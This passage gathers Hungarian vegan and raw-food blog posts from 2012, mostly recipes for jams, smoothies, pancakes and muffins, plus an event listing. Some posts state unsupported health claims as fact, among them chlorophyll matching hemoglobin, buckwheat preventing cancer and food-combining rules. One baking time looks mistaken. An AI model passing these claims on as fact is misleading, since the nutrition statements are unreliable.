kinyújtjuk, majd háromszögekre vágjuk fel. A formák szélesebb végére ráhalmozzuk a tölteléket - jelen esetben a tejből visszamaradt mogyorót szilvalekvárral kevertem ki, valamint gyümölcscukorral édesítettem. A háromszögek hosszabb végénél kezdjük el felcsavarni. Ilyen egyszerű a kiflikészítés technikája. A felcsavart kifliket sütőpapíros tepsire fektetjük, pihentetjük az egészet kb. 20 percet. Sütés megkezdése előtt vízzel vagy, ha maradt, mogyorótejjel megkenjük őket. Kb. 20 perc közepes lángon történő sütés után ismét megkenjük most már mindenképp vízzel. Még max. 10 percig sütjük és el is készültek az ízletes vendégváró kiflik! Persze mogyorótej helyett használhatunk vizet is vagy más növényi alapú tejet. Későbbiekben egyszerű kenyértésztával készítettem hasonló kifliket. Nyilván a szilvalekvárt akkor nem kevertem ki a mogyorótej összepépesített mogyorójával, hanem csak natúr kentem meg a lekvárral a kifliket. Ezt akár reggelire is fogyaszthatjuk, magunkkal vihetjük a munkába is, vagy nagyobb adag készítése esetén kisebb csomagokban fagyasztóba rakhatjuk. Ha kivesszük, csak egy keveset kell várni, míg felenged és fogyaszthatjuk is (pl: mire munkahelyünkre beérünk ki is enged, ha szalvétába csomagoljuk). Vendégség esetén akár rövid ideig a fagyasztott kifliket át is süthetjük, így melegen kínálhatjuk barátainknak, családtagunknak. Én minimálisan megnöveltem a mennyiséget. Így kb. 90 szem kiflicske készült.
Klorofill Koktél - Spenót - Alma
2012. szeptember 22. Fittanyuka Blog
Egészségünk megőrzéséhez és a Ph egyensúlyunk helyreállításához ellengethetetlenek a klorofillok, vagyis a zöldek. A sötét, zöld színű levelek tartalmazzák és napfény hatására képződik. Az klorofill kémiai szerkezete szinte majdnem megegyezik az emberi vér hemoglobinjával. A hemoglobin az a pigment, amely a vér vörös színét adja. A különbség a klorofill és a vér között csupán annyi, hogy a klorofill magnéziumot, míg a vér vasat tartalmaz. Ha szervezetünket megfelelő mennyiségű zöld színű levélzöldséggel, vagy zöld színű itallal látjuk el, nem szenved hiányt semmiben. A zöld levelek nagy mennyiségű ásványi anyagot, vitamint, enzimet juttatnak szervezetünkbe, természetes formában. Kiváló, jól felszívódó növényi fehérjéket tartalmaznak. Az összes esszenciális aminosav is megtalálható bennük. A klorofill gyógyító, gyulladásgátló, fiatalító hatású, segíti a szervezetben a vörös vértestek képződését. Kiváló sejtépítő és sejtregeneráló hatása is ismert, ezért fiatalítja a testet, és a bőrt simává varázsolja. Immunrendszer erősítő hatása utolérhetetlen. Az alábbi koktélhoz friss spenótlevelet használtam. Az erős zöld ízt az alma és a kókusztejszín szelidíttte meg. Ételtársítási tipp: Fontos tudni amit már annyiszor hangsúlyoztam, hogy a zöldségeket nem keverjük a gyümölcsökkel. KIVÉTEL az ALMA, amely a gyümölcsök prototípusa. Viszont ilyenkor is célszerű erjedésgátló fűszert használni, amiből csipetnyi is elegendő. Nagyon kellemes ízű koktélt kaptunk. Nagyszerű reggelire a nap kezdéshez, vagy akár még a délutáni órákban is fogyaszthatjuk. Az alma miatt estére nem ajánlom. Az eszenciális olajok hozzáadást se hagyjuk ki, mert elengethetetlenek jó néhány vitamin felszívódásához. Az év azon szakaszába fogyasszuk amikor még hozzájutunk friss spenótlevélhez. A böjti időszakban is ihatjuk a bevezető,-felépítő szakaszokban. Hozzávalók: 250 g friss spenót levél 3 db alma 200 ml kókusz tejszín 2 evőkanálnyi hidegensajtolt lenmagolaj vagy szezámmagolaj csipetnyi fahéj 100-200 ml víz A hozzávalókat alaposan összeturmixoljuk. Fittanyuka
Lékúránk 4. napja
</a Elnézést, de tegnap nagyon menős-munkás napom volt, estére már nem volt kedvem publikálni Nincs is sokfajta lé, mert 1 nagy adagot csináltam, és pici vacsi Egész délelőtt ügyeket intéztem, így az elcsábulás elkerülése érdekében megcsináltam magamnak a világ legfinomabb smoothie-ját;) Hozzávalók: 2 méz édes őszibarack 1 vilmos körte 1 édes alma 1 maréknyi saláta [...]
Feketebodza lekvár
Szívemben melegséggel tölt el a gondolata. :) Rendhagyó, különleges, picit macerás, és nagyon finom lekvárt készítettem bio fekete bodzából. Bio, mert a falucska közepén lévő ház hátsó kertjében a bokor már gyermekkoromban is egyfajta "telekkerítésül" szolgált. Nőtt magától szép nagyra, szinte fa méretűre cseperedve, mindenféle gondozási igény nélkül. Persze akkoriban még nem ismertem, nem tudtam, hogy a fehér felhőcskék gyümölcséből, a fekete bodzabogyókból zseniálisan finom, fekete szeder ízre hasonlító lekvárt lehet főzni. Csak azt sajnálom, hogy néhány üveggel készítettem (elvégre van egy csomó barack és néhány eper lekvár is a polcokon, plusz a tavaly és tavalyelőtti "termeléseim"), valamint azt, hogy otthonunktól majdnem 200 km-re (190) fekszik ez a kicsiny kis falu, melyet régen svábok is laktak. Főként földműveléssel, állattenyésztéssel, fakitermeléssel foglalkoztak a helyi lakosok. Jelenleg az ott élők lélekszáma alig haladja meg a 300-350 főt. Ennek a településnek egyik parasztháza mögött szedtem a bodzát, udvarán pedig az almát és a szilvát, amiről korábban már meséltem. A recept: Hozzávalók: 1 nagy tálnyi feketebodza 2-3 szem alma 10 szem szilva (nálam sárga szilva volt, de ez el is hagyható, helyette almával pótolhatjuk) 10 dkg gyümölcscukor üvegek befőzési fólia Elkészítés: A bodzaszemeket villa segítségével lefésüljük. Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul. 1. A gyümölcsök alapos átmosása (többszöri vízben, a fekete bodzaszemek háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása. Fekete bodza esetében rossz szemeknek minősülnek a zöld, vagy nem egészen fekete szemek, illetve az apró szárak, amik a vízzel való mosás során az a víz tetejére jönnek fel. Ezek ugyanis alhasi fájdalmakat, hasmenést okozhatnak. 2. Az üvegecskék előkészítése. A következő hadművelettel érdemes ezt végezni: Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig vagy harmadáig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már forr a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat. A lekvár elkészítése: Miután alaposan átmostuk a gyümölcsszemeket odatesszük főzni. Közben apróra vágjuk az almákat (héjastul) és a szilvákat, szintén beletesszük. Ez segít a kocsonyás állag elérésében. Amikor már rotyog, belerakjuk az édesítő szert. Nekem mindössze 10 dkg gyümölcscukor elég volt hozzá. Ezt már akkor tettem bele, amikor szinte kész volt. Egy tömörebb anyagú lekvárt kaptam, pedig csak a szilva és az alma volt a kocsonyásító. A felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet (konyharuhával megfogva) és a helyére az elkészült lekvárt öntjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk. A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy kosárban. De máskor már rekeszbe vagy lavorba is tettem lekvárt, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 48 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni. Természetesen maradt ki még egy kevés, ami nem került üvegbe. Gyorsan el is fogyott. Lekvárfőzésnél megeshet, hogy nem tudjuk az egészet üvegbe tölteni. Tiszta edénybe rakva (akár üveg) a hűtőben egy darabig megőrzi minőségét. Bár szerintem előbb elfogy, mint megromlana.
Zöldturmix Fesztivál október 7 vasárnap!
2012. szeptember 15. Nyersétel akadémia
Családi egészségnap és Zöld Turmix Fesztivál a Kőrösiben! Immár másodszor találkoznak a nyers étkezés rajongói a Kőrösi Csoma Sándor Kőbányai Kulturális Központban, 2012 október 7-én.
A Zöldturmix fesztivált a Nyersétel Akadémia szervezi, és a Családi egészségnap keretében, az 1-es teremben kap helyet.
Minden belépő kap egy pohár zöld turmixot!
A Zöldturmix fesztivál programjai:
Az 1-es teremben:
10.00 Lénárt Gitta köszöntő, miért igyunk sok zöld turmixot? zöld turmix készítés, kóstoló
10.15 Dobrocsányi István: Csírák, búzafű, árpafű
11.00 Kovács Zsolt – GYÜMÖLCSÉTREND-Egészségmegőrzés és Fizikai Teljesítőképesség Növelése”
12.00 Nyersétel Akadémia nyersétel készítés és kóstoló
13.00 Bolyky Tamás előadása – Egyszerűség a nyersételek világában, csíráztatás, árammentes konyha, léböjt…
14.00 Életkonyha nyersétel készítés és kóstoló
15.00 Győrffy Zsuzsanna Naturkozmetikumok a mindennapokban
16.00 Juhász János (Élet és Energia kft) Védekezés a káros sugárzások ellen
A színházteremben
14 óra Lénárt Gitta 100 évesen is egészségesen
A kiállítók az alábbi termékeket kínálják: nyers rágcsálnivalók, nyers édességek, aszalt alapanyagok, csírák, zöld búzafű, nyers biotermékek, bio zöldségek, gyógynövények, kristályok, nyersételes és egyéb könyvek, nyers lekvárok, csíráztatott-szárított-nyers magok, melyeket azonnal lehet fogyasztani, profi konyhai eszközök, tároló edények, amelyekkel könnyen tudod elkészíteni, illetve szállítani a nyers ételeket, vagyis nagyon sok mindent, amivel egyszerűbbé teheted a nyerskosztos napjaidat.
Találkozhatsz nyers szakácsokkal, kóstolhatsz nyers ételeket, és még sok más program vár rád.
Nyersétel készítő verseny a Zöldturmix Fesztiválon!
Részletek itt:
A Zöldturmix fesztiválon lesz gyógynövény tanácsadás is.
Friss hírek a www.zoldturmixfesztival.hu weboldalon, és a facebook-on itt: FACEBOOK
Alma és Nektarin aszalás
Augusztusban egy eldugott kis faluban jártunk, ahol igazság szerint sok időt töltöttem gyermekkoromban. Az élet a világ ezen a részén egészen más. Az emberek sokkal egyszerűbbek mind életvitel, mind gondolkodás tekintetében. Szeretem a vidéket ezért is. Városoktól jó néhány kilométerre teljesen más élet zajlik. Az emberek még inkább összejárnak esténként vagy esetenként, legalább is az egymás szomszédságában élők, pláne, ha az egész életüket egymás közelében élték le. A levegő minősége is egészen más. Folyamatosan álmos voltam ottlétünk alatt az első pár órában, annyira friss, oxigéndús arra a levegő. Jó volt találkozni azokkal a nénikkel, akik felcseperedésem ideiglenes tanúi lehettek nyaranként. A ház és a telek, ahol gyermekkorom nyarait töltöttem, mindig gazdag volt gyümölcsben és zöldségben. Most savanykás almát és fekete bodzát hoztam haza. Sajnos a körtefa nem hozott jelentős termést, se a diófa. Viszont ott helyben rengeteg sárga szilvát ettem. Nem ringlót. Teljesen olyan alakja volt, mint a szilvának, csak sárga színben pompáztak a gyümölcsök a fán. Persze a kék szilva akkor még nem érett. De ez is teljesen kiszolgált. Még ott helyben rétest is sütöttünk, de erről majd egy későbbi bejegyzésemben mesélek, csak legyen időm eljutni odáig... Ugyanis nagyon sok elmaradást szeretnék pótolni. Élményeket, recepteket, és ráadásul az életmód-előadások is kezdetét veszik, szóval jól jönne néhány nap, amit csak blogírással tölthetnék, de mindemellett és a napi munkavégzésen felül vár rám itthon a padlizsán, a paradicsom, a paprika, a szilva, hogy télre tartóssá varázsoljam. :) Az utóbbi időkben pedig a lakhelyünkön történtek némi munkálatok, amik szintén blogírástól távolmaradásra késztettek. De most itt vagyok és talán szeptember végéig (húúú, a felén már túl vagyunk) behozom lemaradásom. Szóval a kis faluban, a legalább 50 éves - talán életében sosem permetezett, tehát igazán bio - almafáról szedett almákat és piacon vett néhány szem barackot aszaltam az alábbiak szerint: Az almákat és a nektarinokat alaposan megmostam. Majd az almákat kerek szeletekre, a nektarint pedig vékony szeletekre vágtam. Az alma tuti bio. :) Magházuk egy része lakókat:) tartalmazott, ezeket egyszerűen kivágtam. Szerencsére néhány éve már birtokunkban van egy olcsóbb "asztali" aszaló. Lapjaira fektettem a gyümölcsöt és indult az aszalás. Az almák valamivel gyorsabban elkészültek, mint a nektarin. Úgy 4-5 óra elég volt. Mindegyik nagyon finom lett. Már várom a telet, amikor az almákat akár teának is felfőzöm. Lényegében csak víz és áram fogyott. Az almák vidékről jöttek. Az Eleken vásárolt kosárkámat teleszedtem. Minap néztem, a Herbaházban 70 g szárított alma borsos árát. Hát, elmondhatom, gazdagok vagyunk. :) Számunkra ez az igazi gazdagság. (Fizikai, tárgyi tekintetben.) Hála érte Istennek!:) Néhány fotóval prezentálom az aszalás menetét. :)
Zöldségcurry
2012. szeptember 12. Gitta nyersétel blogja
Egy idő után azokat a recepteket részesítem előnyben, ami egyszerűen és gyorsan kész van, mégis finom. Ez a recept kivétel. Több összetevője van, mint amennyit én szívem szerint használnék, de most mégis kipróbáltam... és hát nem bántam meg. Igazi különlegesség lett! Hozzávalók: Zöldségek: 2 sárgarépa reszelve, 1 cukkíni kockákra vágva, 1/2 paprika kisebb darabokra vágva, 1/2 fej lilahagyma, friss gyömbér reszelve, egy marék mazsola, valamilyen édes gyümölcs, ami most 1 őszibarack volt, és néhány friss menta levél (szerintem más zöldségekkel is jó, brokkoli, retek, karfiol, zeller...) Curry szósz: 3 dl kókusztej (kókusztejporból turmixoltam), egy marék szezámmag (ettől kicsit kesernyés lett), egy marék mazsola ide is, egy kanál miso (ez erjesztett szója vagy rizs, nagyon különleges ízt ad), 1 teáskanál curry por, 1 narancs leve. Sem sót, sem édesítőszert nem tettem bele, a miso sós volt, az aszalt és friss gyümölcsök édesek. A zöldségek darabolás közben: A barack és a mazsola is hozzájött: A szószt külön nem fotóztam le, de így nézett ki, amikor a tálban a zöldségekre ráöntöttem a levet: Elkészítés: A zöldségeket összevágjuk, tálba tesszük. A szószhoz a hozzávalókat turmixgépben simára keverjük, és a zöldségekre öntjük. Nem kell megijedni, ilyenkor a szósz még híg, de a zöldségek be fogják szívni, és egy óra múlva már egy ízben összeérett, nagyszerű ételt kapunk. A szószból az ízeket és a nedvességet beszívják magukba a zöldségek, és felpuhulnak. A végén tettem még hozzá apróra vágott aszalt paradicsomot... az a piros ott a tetején :) Reggel elkészíted, dobozba teszed, és délben jól megeszed. Délre ilyen szépen összeáll: Pár levélke menta, egy kis paradicsom jól illik hozzá, egy pár szem mandula vagy kesudió... nem árt neki. Rágd meg jól!
Nyers torták
2012. szeptember 9. Gitta nyersétel blogja
A nyerskonyha egyik legkedveltebb ételei a nyers édességek, azon belül a torták. Mivel nem kell őket sütni, hamar készen vannak, ugyanakkor fantasztikusan finomak. Étel allergiások is fogyaszthatják, ugyanis nem tartalmaznak sem lisztet, sem tojást, tejterméket. Nincs bennük hozzáadott cukor. Nem hagyományos sem az elkészítésük, sem a díszítésük, a természetesség és a frissesség dominál. Íme néhány torta, amelyeket eddig megosztottam: A narancsos csokitorta, amely narancs helyett elkészíthető bármilyen élénk ízű gyümölcsből, eper, málna, ananász, stb... A narancsos répatorta Az egyik nagy kedvenc, az avokádós citrom torta Az eper torta A valentin-napi fagyitorta Az epres-banános fagyitorta A legutóbb készült születésnapi torta Most legutóbb a nyersétel tanfolyamon készült ez a csodás gyümölcstorta. Csokis gyümölcstortaHa szeretnéd megkóstolni frissen készült tortáinkat, gyere el szeptember 13-án csütörtökön a Nyersétel Akadémiára, a torta-kóstoló partinkra! 16 és 20 óra között jöhetsz bármikor, a belépés ingyenes és nem kell bejelentkezni sem Cím: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő Bővebben itt olvashatsz: Nyers torta party Még egy csábító csokitorta fotó:
Hajdinalisztes palacsinta citromkrémmel
2012. szeptember 7. Fittanyuka Blog
A hajdina (más néven pohánka, tatárka) jótékonyan hat az érrendszeri megbetegedéseknél, a magas vérnyomásban szenvedőknél és a cukorbetegeknél. Kiemelkedően magas élelmirost-tartalma miatt a bélperisztaltika növelésén és a tranzitidő lerövidítésén keresztül jól alkalmazható a népbetegségnek tekinthető székrekedés (obstipatio) étrendi kezelésében és egyes daganatos megbetegedések (például vastag- és végbéldaganat) megelőzésében. A hajdina alkalmazható a Candida albicans fertőzés étrendi kezelésében is. A belőle készült lisztből készíthetünk palacsintát, próbáltam más jellegű süteményeknél is, de jellegzetes íze miatt ( ami egyébként nem rossz ízt jelent), nem aratot nagy sikert. A palacsinta a kellemesen savanykásan - édes citromkrémmel nagyon finom ízhatású. Próbálhatjuk más krémekkel is, vagy cukormentes lekvárokkal. Hozzávalók: 200 g hajdina liszt 200 g világos tönkölyliszt 1 l víz 3 evőkanál kókusz olaj késhegynyi szódabikarbóna kókusz olaj a sütéshez. A fenti összetevőkből palacsinta tésztát keverünk és kókusz olajjal kikent palacsinta sütőn egyenként kisütjük. Citromkrém: 400 ml kókusztejszín 3 evőkanál keményítő 2 evőkanál nyírfacukor 1/2 citrom leve 1/2 citrom reszelt héja pár csepp citrom olaj A kókusztejszínt összekeverjük a vízzel, csomómentesen elkeverjük a keményítővel, hozzáadjuk a citrom levet, héját és olajat. Lassú tűzön, állandó keverés mellett addig főzzük ameddig besűrűsödik. A krémhez adhatunk cukormentes (kukoricasziruppal), kandírozott citromhéjjat, vagy aranymazsolát. Hagyjuk kihűlni, majd hidegen mégegyszer átkeverjük és igényt szerint töltjük vele a palacsintáinkat. Fittanyuka
Vegán kukoricás áfonyás muffin
2012. szeptember 2. Zizi kalandjai
Igen, egy újabb édesség... ígérem ezután sós recept jön, Kata! :) Pénteken sütöttem először és az eredmény nem várt siker lett. Olyan wow élmény. Éppen ezért gyorsan fogytak (I. nagyon rájárt :)). Még Jucinak is jutott belőle két darab. Persze könnyelműen megígértem, hogy este jövök a recepttel, de olyan fáradt voltam, hogy nem volt erőm összedobni a bejegyzést.
Arra viszont volt erőm, hogy egy újabb adagot előkészítsek. Aztán szombaton reggel 6-kor keltem, hogy még a piac előtt kisüssem a következő adagot, amit aztán délután vittünk vendégségbe. Ott azonnal kérték a recept... nem csodálkoztam.
Kukoricának és áfonyának még szezonja van, szóval ne hagyjátok ki! A receptet Emily blogján találtam, néhány apróságot változtattam csak rajta.
Vegán kukoricás áfonyás muffin
Hozzávalók 12 db-hoz:
- 1 evőkanál őrölt lenmag
- 3 evőkanál víz
- 1 bögre kukoricadara
- 1 bögre tönköly fehérliszt
- 1 evőkanál sütőpor
- 1/2 teáskanál só
- 1 bögre zabtej (rizs- vagy szójatej is használható)
- 1 evőkanál almaecet
- 1/3 bögre nádcukor
- 1/4 bögre kókuszolaj (napraforgó olaj is használható helyette)
- 1 vaníliarúd kikapart magjai
- 1 bögre áfonya
- 1 bögre friss kukorica
Egy tálkában keverjük össze az őrölt lenmagot a vízzel (ez szolgál a tojás helyettesítésére) és hagyjuk állni 6-8 percig. A kukoricáról vágjuk le a szemeket (kb. 1 kisebb cső ad 1 bögrényit, persze használhatunk fagyasztott kukoricát is) és tegyük félre. Béleljük ki a muffintepsit papírkapszlikkal.
Melegítsük elő a sütőt 180 fokra.
Egy tálban keverjük össze a száraz hozzávalókat: kukoricadara, tönkölyliszt, sütőpor, só. Egy másik tálban keverjük össze a zabtejet az almaecettel, keverjük el benne a nádcukrot, majd adjuk hozzá a kókuszolajat és a vaníliát. Öntsük hozzá a lenmagot, keverjük el. Adjuk a nedves hozzávalókat a szárazhoz és jól keverjük össze a tésztát. Most jönnek az áfonya- és kukoricaszemek. Óvatosan keverjük, hogy minél több áfonyaszem maradjon egyben.
Kanállal osszuk el a tésztát egyenlő részben a muffinformákban. Süssük 180 fokon kb. 20-25 percig. Kivétel előtt azért végezzünk tűpróbát, hogy jól átsültek-e a muffinok.
Kölesmorzsák élő fahéjas szilvalekvárral
Még mindig maradt kölesem, ebből már mindenképp édességet kellett csináljak Hozzávalók személyenként: 1 maréknyi főtt köles 1 csipet vaníliapor 5 csepp Stevia Ezeket jól összekeverjük, és egy tálkába tesszük. Megcsináljuk a lekvárt is: 5 szem nagyon édes szilvát botmixerrel pépesítünk 1 kávéskanálnyi fahéjjal. Ráöntjük a kölesre, díszítjük friss citromfűvel, és már ehetjük is A szilva [...]
Tejespite sütés a nagyival
2012. augusztus 29. Zizi kalandjai
A nagyik aranyat érnek, ugye? Mindig van nekik egy titkos receptjük és ha sokáig kérleljük őket, hajlandók megosztani velünk. Mi meg a nagyvilággal. :) Ez a tejespite is egy ilyen recept.... akárcsak a foszlós kalács és briós receptem, amelyet a másik nagyimtól tanultam (gyerekkoromban figyeltem hogyan fonja a kalácsot), vagyis az ő receptje, de nekem már anya tanította meg.
A tejespite tulajdonképpen sütőben sült vastag palacsinta. A receptje a hagyományos palacsintáéra épül, csak egy kicsit sűrűbb tésztát kell kikeverni, aztán mehet is a sütőbe. Nem túl édes, nem is sós, magában is puha, finom. Általában valamilyen házi lekvárt - jelen esetben a nagyi által készített szilvalekvárt - kentünk a tetejére. Kiváló melegen, langyosan és kihűlve is, mondjuk másnap reggelire.
Én nagyon szeretem. Szerintem ti is fogjátok!
Tejespite
Hozzávalók:
- 1 liter tej
- 2 db bio tojás
- 410 g sima búzaliszt, szitálva
- 3 teáskanál cukor
- 1 teáskanál só
- kevés napraforgó olaj a tepsi kikenéséhez
Egy tálban verjük fel a tojásokat és keverjük el bennük a cukrot és a sót. Öntsük hozzá a tej 1/3-át, keverjük el és adjuk hozzá a liszt 1/3-át is. Keverjük fakanállal simára a tésztát (ne maradjon csomós), majd még két részletben öntsük hozzá a maradék tejet és lisztet is. A lényeg, hogy sima, sűrű palacsintatésztát kapjunk. Hagyjuk állni, amíg a sütő felmelegszik 170 fokra.
Olajozzunk ki egy tepsit (hagyományos, kb. 36*36 cm-es) és öntsük bele a tésztát. Süssük kb. 150 percig 170 fokon. Akkor jó, ha kicsit megbarnul a teteje. Szeleteljük fel és tálaljuk azonnal.
Megkenjük szilvalekvárral...
Natúr baracklekvár
Megkésve bár, de törve nem... Eljutottam végre oda, hogy leírom a baracklekvár készítésemet. Natúr baracklekvárt készítettem, vagyis nem került hozzáadásra se cukor, se semmilyen más édesítő, se lekvárok befőzéséhez gyakran használt zselésítő (dzsemfix vagy agar - agar), se tartósítószer. Miért? Azon egyszerű oknál fogva, mert szerintem régen is készítették így nagyanyáink, vagy az ő felmenőik, vagy még régebben, amikor a cukor nem volt úgy elterjedve világszerte. (Máskülönben a Cukorblues című könyvből olvastam, hogy Kolombusz idején a cukor és rabszolga kereskedelem a portugál királyság két alapeleme volt, vagyis meglehetősen régen, néhány évszázaddal ezelőtt már folyt a harc a cukorért, igaz, akkoriban még nem ilyen formában és nem ennyire elterjedten használták.) Úgy gondolom, és más emberekkel történt tapasztalatcsere által is megerősödött bennem az, hogy a lekvár egészségesebb cukor nélkül, a szükséges édesítést pedig utólag is el lehet végezni. Például a befőzött üvegből tálkába egy kis adagot kivenni és azt mézzel, gyümölcs vagy nyírfacukorral, stíviával, aszalt gyümölccsel, vagy ki mit használ - utólag kis mennyiségben lehetséges édesíteni. Candida betegséggel küzdőknek külön szeretettel ajánlom ezt a módszert. A recept: Hozzávalók: - néhány kg sárgabarack - befőttes üvegek - celofán - víz - tepsi - meleg "ágy" Elkészítés: A sárgabarackokat alaposan átmossuk. Én legalább háromszor egymás után átmostam őket. Még a nagybani piacon vettünk kétfajta sárgabarackot. Kisebb és nagyobb szeműt. Ezeket dolgoztam be a lekvárba (is). Jól jártam velük, mert szinte hibátlanok voltak. Amennyiben barackjaink nem tökéletes szeműek, a hibás részt vágjuk ki, vagy ha a barackszem nagy részét érinti, az egész barackszemet bele se tegyük a lekvárba. A puha barackokat kezünkkel kicsit megnyomva két részre tudjuk bontani. Ha ez működik, akkor tényleg jó érett a barack, dolgozhatunk vele bátran. Miután megfeleztük, a magokat kiszedjük. (Érdemes őket félretenni.) Ha van otthon botturmixunk, akkor elég a gyümölcsöket megfelezve a legmagasabb fazekunkba rakni. Ha nincs botturmix a birtokunkban, akkor érdemes a gyümölcsszemet legalább 4 részbe vágni, így könnyebben fog pépesedni. Most már csak annyi a dolgunk, hogy közepes lángon elkezdjük főzni, illetve a főzés elején botturmix vagy krumplinyomó segítségével (esetleg nagyobb villával) összenyomkodjuk a gyümölcshúst. Amíg felforr előkészítjük az üvegeket. (Inkább néhány üveggel többet készítsünk elő, mint kevesebbet!) A már kívül- belül megtisztított üvegeket egy tepsibe tesszük. A tepsibe és az üvegekbe is vizet öntünk. A tepsibe inkább többet, az üvegekben az üvegek aljára kb. 1-1,5 dl víz elég. Az egészet sütőbe tesszük és amíg a víz az üvegekben el nem kezd forrni, a sütőben melegítjük őket. Amikor felforrtak és a baracklekvárunk is rövid ideje rotyog, kivesszük az üvegekkel teli tepsit a sütőből és az alábbiak szerint járunk el: E gyesével első lépésként kiöntjük a forró vizet az üvegből és tiszta merőkanállal vagy kisebb kancsóval a forró lekvárt töltjük az üvegbe. Fóliát, majd kupakot helyezünk rá. Jól leszorítjuk a kupakkal és az elkészített meleg "ágyba" (száraz dunszt) helyezzük fejjel lefelé az üvegeket. A száraz dunszt nálam egy törölközőkkel kibélelt kosár volt most. Néhány napig a kész lekvárokat ebben a száraz dunsztban hagyjuk pihenni, hűlni. 2-3-4 nap után leellenőrizzük és ha az üvegek normál hőmérsékletre álltak vissza, felcímkézzük őket és mehetnek a kamra polcára. Ami a lekvár állagát illeti: Ha nem főzzük túl, és a barackokat sem préseljük agyon a krumplinyomóval vagy a botturmixszal, akkor nem lesz nagyon folyós a lekvárunk. A lekvár elkészülte után néhány héttel palacsintát sütöttem, amihez meg is nyitottuk az első üveget. Mivel a férjem édesebben szereti, így neki egy kicsit édesítettem mézzel (dióval keverve), de azok, akik cukorbetegek, vagy figyelniük kell, hogy ne legyenek cukorbetegek, vagy csak szeretik a fanyarabb, természetes ízeket (én nagyon!), azoknak ajánlom ezt a módszert. Ha jó alaposan lezárjuk az üvegeket a száraz dunsztba tétel előtt, akkor nem mennek tönkre. Hiszen az én kis üveg lekvárom a palacsintához remekül szolgált. A baracklekvárról még annyit, hogy esetleg bebarnulhat. Ennek a titka is az, hogy nem kell sokáig rotyogtatni és gyorsan üvegbe kell tölteni. Ha üvegbe töltjük, esetleg az üvegben az alsó része (felfordításkor még felső) picit megbarnulhat, de nem jelentős. Nálam 2-3 üvegnél megbarnult. A palacsintához ilyet vettem elő, de semmi baja nem volt.
Csinta-Palacsinta (vegán, vagyis tej és tojásmentes)
Mint rendszeres olvasóim már tudják, gofrit, más néven waffelt már készítettem "vegánul", vagyis tej és tojásmentesen. Mivel édességet az utóbbi időben - köszönhetően a sok finom friss gyümölcsnek - ritkábban készítek, így a tej és tojásmentes palacsinta váratott magára egészen addig, míg nem bírtam tovább, és férjemet, valamint magamat megörvendeztettem egy kis csinta-palacsintával. :) Fincsi lett, nem ragadt le, és még másnapra is jutott belőle... (Hiába no, két főre nem kell túl sok.) Általam főzött baracklekvárral is ízesítettem. És a baracklekvárt még mindig nem írtam le nektek.... (Amíg késik, nem múlik...)
A recept:
Hozzávalók:
- 10 dkg teljes kiőrlésű liszt
- 17 dkg fehér liszt
- 1/2 l növényi tej - jelen esetben diótejet készítettem.
- 1 csipet só
- 5 dkg lenmag (őrölve)
- 5 dkg zabpehely (őrölve)
Elkészítés:
A száraz hozzávalókat összekeverjük egy tálban, majd folyamatos keverés közben hozzáöntjük a növényi tejet. Szerintem növényi tej hiányában szénsavas vízzel is próbálkozhatunk, a zabpehely és lenmag segíti a tésztát abban, amiben máskülönben a tojás. Ezt azért is merem állítani, mert amikor már csak egy-két palacsintára való adag volt, akkor ismét kevertem hozzá valamennyi vizet, és kétfajta lisztet. Amikor összekeverjük, elvileg palacsintaszerű tésztát kell kapjunk. Ha túl sűrű, vízzel hígíthatjuk. Ha túl folyós, keverjünk hozzá még egy kevés lisztet.
A palacsinta sütőnket - remélhetőleg teflon bevonatú edény - felmelegítjük. A legelső sütéshez a biztonság kedvéért cseppentettem két csepp olajat, vagy tehetünk bele icipici kókuszzsírt. A továbbiakhoz egyáltalán nem használtam semmilyen olajat vagy zsírt. De ehhez szükséges, hogy teflon bevonatú sütővel dolgozzunk.
Miután kisültek a palacsinták, megtöltjük őket. Ez az alábbiak szerint történt nálam:
Korábbiakban (miután megjöttem Elekről) főztem jó kis házi sárgabarack lekvárt. (Megpróbálom még augusztusban feltenni róla a bejegyzésemet.) A diótej leszűrése után visszamaradt diót összekevertem a lekvárral. (Szükség esetén édesíthető.) Így barackos-diós töltelékkel töltöttem, míg a töltelék el nem fogyott. Ezt követően pedig 1 marék áfonyát összetörtem villával, tettem hozzá kókuszreszeléket (igény esetén édesíthető) és ezzel töltöttem meg a maradék kisült palacsintákat.
Nos a fenti leírásaim is eltérnek a szokásos "kakaós, lekváros, mákos, túrós" palacsintáktól, és mégis nagyon finomak. Egészségesek, főként, ha olaj nélkül sikeres palacsintákat sütünk!
Fő az őszinteség + vegán mandulás csokis banánkenyér
2012. augusztus 21. Zizi kalandjai
Zabtej kis üvegekben
A Goldenblog 2012-es versenye kapcsán eszembe jutott néhány gondolat. Ezeket szeretném megosztani veletek... őszintén. Én azokat a blogokat preferálom, amelyek értéket közvetítenek, adnak, új információval szolgálnak számomra, szépek a képek, tanulhatok a leírtakból, inspirálnak, alkotásra ösztönöznek, elgondolkodtatnak, esetleg közösséget építenek.
